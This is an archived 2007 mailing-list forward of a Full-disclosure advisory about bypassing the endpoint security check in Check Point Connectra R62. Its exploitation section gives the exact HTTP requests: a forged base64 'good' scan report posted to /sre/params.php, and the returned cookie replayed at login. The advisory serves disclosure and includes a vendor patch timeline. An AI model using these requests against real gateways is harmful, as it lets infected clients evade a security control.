The article says a patch has been released, but it's not at
http://www.checkpoint.com/downloads/latest/hfa/connectra/index.html yet.
Note that while this apparently generates a false "I'm OK" result, you still
need valid credentials to get logged on.
Ray
------------------------------------------------------
From : Roni Bachar <[EMAIL PROTECTED]>
Sent : Monday, January 22, 2007 5:37 AM
To : <[EMAIL PROTECTED]>, <[email protected]>,
<[email protected]>, <[EMAIL PROTECTED]>
Subject : [Full-disclosure] Check Point Connectra End Point security
bypass
I. INTRODUCTION
Check Point Connectra is a complete Web Security Gateway that provides SSL
VPN access and comprehensive endpoint and integrated intrusion prevention
Security in a single unified remote access solution. By combining both SSL
VPN connectivity and security in one solution, organizations can effectively
deploy SSL VPNs Safely and securely to a diverse set of remote users while
ensuring the confidentiality and integrity of information that is critical
to the success of any business.
For more Information please refer to:
http://www.checkpoint.com/products/connectra/index.html
II. DESCRIPTION
One of the major things in Check Point Connectra is Comprehensive endpoint
security. Before a client connects to the internal network a test is being
done on the client to check if there is any security hazard on his computer.
If a hazard is detected the user is prompted with the hazard details and
asked to run the test again before getting the ability to login to the
network.
A bypass to this test has been detected by Roni Bachar and Nir Goldshlager.
A user with a security hazard or a Trojan can bypass the end point security
tests and login to the network with a security hazard on his computer. The
bypass is being done by sending a "good" report to the /sre/params.php page
after sending the report a set cookie will be send from the server to the
client. This cookie can be used to bypass the endpoint security findings.
The bypass was detected on the latest version of checkpoint connectra R62.
III. EXPLOITATION
The vulnerability can be exploited by doing the following stages:
Sending a post request as followed:
POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1
Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
1NyZVNjYW5SZXBvcnQ+Cg==
After sending the request a Set-Cookie will be received from the Check Point
Connectra server
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d;
expires=Tue, 13 Sep
2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html
This ICSCookie is needed to be enteredd into the next request
GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
..NET CLR
1.1.4322; .NET CLR 2.0.50727)
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1;
ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d
IV. WORKAROUND
Check point released a patch for this vulnerability.
V. DISCLOSURE TIMELINE
20.12.06 First Identification of the flaw
24.12.06 Reporting the flaw to checkpoint
27.12.06 Meeting checkpoint security stuff
22.01.07 Publishing the vulnerability.
22.01.07 Checkpoint Released a patch for the vulnerability
VI. CREDITS
The vulnerability was discovered by Roni Bachar and Nir Goldshlager.
_________________________________________________________________
The MSN Entertainment Guide to Golden Globes is here. Get all the scoop.
http://tv.msn.com/tv/globes2007/?icid=nctagline2
=================================================
To set vacation, Out-Of-Office, or away messages,
send an email to [EMAIL PROTECTED]
in the BODY of the email add:
set fw-1-mailinglist nomail
=================================================
To unsubscribe from this mailing list,
please see the instructions at
http://www.checkpoint.com/services/mailing.html
=================================================
If you have any questions on how to change your
subscription options, email
[EMAIL PROTECTED]
=================================================
--------------------------------------------------------------
This e-mail and any attachment thereto contains confidental and/or privileged
information. If you are not the
intended recipient or have received this e-mail in error, please notify the
sender immediately and delete this e-mail
and any attachment thereto from your system. Any unauthorized retention,
copying, transmission, distribution,
disclosure or use of the content of this e-mail and/or any attachment thereto
is prohibited.
Techem is not liable for any omission or error in this e-mail and/or any
attachment thereto which may arise as a
result of the e-mail-transmission or for damages resulting from any
unauthorized change of the content of this e-mail
and/or any attachment thereto.
Thank You
Techem Energy Services GmbH
=================================================
To set vacation, Out-Of-Office, or away messages,
send an email to [EMAIL PROTECTED]
in the BODY of the email add:
set fw-1-mailinglist nomail
=================================================
To unsubscribe from this mailing list,
please see the instructions at
http://www.checkpoint.com/services/mailing.html
=================================================
If you have any questions on how to change your
subscription options, email
[EMAIL PROTECTED]
=================================================
